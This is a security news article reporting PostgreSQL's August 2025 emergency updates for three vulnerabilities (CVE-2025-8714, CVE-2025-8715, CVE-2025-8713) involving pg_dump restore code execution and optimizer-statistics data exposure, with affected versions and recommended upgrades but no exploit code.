The PostgreSQL Global Development Group has taken decisive action by releasing emergency security updates on August 14, 2025. This update addresses three critical vulnerabilities that pose significant risks, particularly during database restoration processes. All supported versions from PostgreSQL 13 through 17 are affected, necessitating immediate patching across enterprise environments.
Dangerous Dump and Restore Vulnerabilities
Among the vulnerabilities, two notable code execution flaws, CVE-2025-8714 and CVE-2025-8715, exploit PostgreSQL’s pg_dump utility, allowing attackers to inject malicious commands into backup files. When these compromised dumps are restored using psql, there is a risk of executing arbitrary code on the target system with the privileges of the user performing the restoration.
CVE-2025-8714 specifically enables malicious superusers to embed psql meta-commands within database dumps. The implications are severe, as these commands can execute on the client system during restoration, potentially compromising entire infrastructure pipelines. This attack vector is reminiscent of MySQL’s CVE-2024-21096, highlighting the dangers of untrusted data inclusion in pg_dump.
| CVE ID | CVSS Score | Impact | Affected Versions |
| CVE-2025-8714 | 8.8 | Arbitrary OS code execution via pg_dump meta-commands | 13-17 |
| CVE-2025-8715 | 8.8 | Code/SQL injection through newline handling in object names | 13-17 |
| CVE-2025-8713 | 3.1 | Data exposure via optimizer statistics | 13-17 |
CVE-2025-8715 takes advantage of improper newline handling in object names, facilitating both client-side code execution and SQL injection on the target server. This vulnerability reopens attack vectors that were believed to be resolved by CVE-2012-0868, underscoring the potential for security regressions during routine maintenance updates.
The third vulnerability, CVE-2025-8713, exposes sensitive data through PostgreSQL’s optimizer statistics system. Attackers can craft malicious operators to bypass view access controls and row-level security policies, gaining access to sampled data that should remain concealed.
Organizations are urged to upgrade to PostgreSQL versions 17.6, 16.10, 15.14, 14.19, or 13.22 without delay. The vulnerabilities are particularly concerning in DevOps environments where automated backup restoration occurs frequently, as compromised dumps can execute with elevated system privileges.
In response to these vulnerabilities, cloud providers have initiated emergency fleet updates, with some disabling customer-initiated logical restore operations until tenant clusters are confirmed as patched. Development teams are encouraged to audit their CI/CD pipelines for pg_dump usage and to implement additional validation steps for backup files.
The PostgreSQL project acknowledges the responsible disclosure of these vulnerabilities by Martin Rakhmanov, Matthieu Denais, RyotaK, Noah Misch, and Dean Rasheed. As PostgreSQL 13 approaches its end-of-life on November 13, 2025, organizations should prioritize migration to supported versions to ensure ongoing security and stability.
AWS Security Services: 10-Point Executive Checklist - Download for Free
